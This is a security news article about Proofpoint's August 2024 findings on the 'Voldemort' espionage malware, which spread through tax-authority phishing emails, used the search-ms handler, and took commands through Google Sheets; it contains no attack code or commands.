In early August 2024, a new piece of malware appeared on the radar of ProofPoint researchers. The virus was dubbed “Voldemort,” a reference to the large virus from the Harry Potter saga, by the cybercriminals behind the operation. According to the investigation by the California-based security firm, it was a  large-scale espionage operation .

First, the hackers began by usurping  the “identity of tax authorities from governments in Europe, Asia, and the United States .” Since the malicious activity began,  more than 70 organizations around the world  have been impersonated . At the beginning of the campaign, a few hundred emails were recorded by ProofPoint per day. The cybercriminals quickly picked up the pace. On August 17, the hackers sent nearly 6,000 emails in 24 hours.

Update your tax information

In France, the hackers chose to pose as the  General Directorate of Public Finances , the department responsible for collecting taxes and social security contributions. The hackers would then contact their victims via email. The email states that  “as part of the update of tax rates and the current tax system, it is necessary to review your tax information .” The attackers ask the victim to update  “their personal and tax information as soon as possible . ”

“This update is essential for the smooth running of your returns and the accurate calculation of your tax liabilities ,” the fraudulent email states to push Target into compliance.

In order to update their tax information, the Internet user must  download the attachment  that came with the email. Not surprisingly, the document will download the Voldemort malware onto your computer. Specifically, it will rely on the "search-ms:" URI protocol handler to open an online file responsible for pushing the malware. Built into the Windows operating system, "search-ms:" will launch customized searches on the computer. It makes it easier to find files or information on the device. This tool is widely abused by hackers. According to Microsoft,  the protocol was exploited, for example, by Russian hackers from APT28.

“Typically, hackers abuse the Windows search protocol (search-ms) to view files hosted on a remote machine locally in a folder. This technique is often used to deploy various remotely accessible Trojans ,” ProofPoint notes.

Google Sheets as a Control Server

Cybercriminals typically use command-and-control servers to communicate with machines infected with their malware. In this case, Google Sheets , a popular online spreadsheet, is turned into a server. To receive instructions, the virus connects to the spreadsheet service. This is a highly unusual move.

Once on the targeted computer and connected to the spreadsheets, Voldemort can test the connection to his server, list and index files on the system, download or send files, execute commands, pause, or shut down the computer altogether. This is obviously when the hackers get what they came for on the computer: confidential data.

State-funded espionage campaign

Insurance companies are the main targets of the spies  . According to ProofPoint, Voldemort is designed to steal information held by certain companies. The virus also targets companies in the aviation, transportation and education sectors. ProofPoint believes that the cyberattack is likely to be orchestrated by  a government-funded hacker gang .

However, at this point, researchers have been unable to trace it back to a specific small group. As our colleagues at  Bleeping Computer reported , a gang known by the codename APT41 has already made a name for itself by exploiting Google Sheets in the past. The Chinese state-sponsored group relied on an open-source tool called “Google Command and Control,” designed to hijack legitimate Google services, such as Google Sheets, Google Forms, or Google Drive, for malicious purposes. It’s known to have targeted industries in the United States, Asia, and Europe for more than a decade.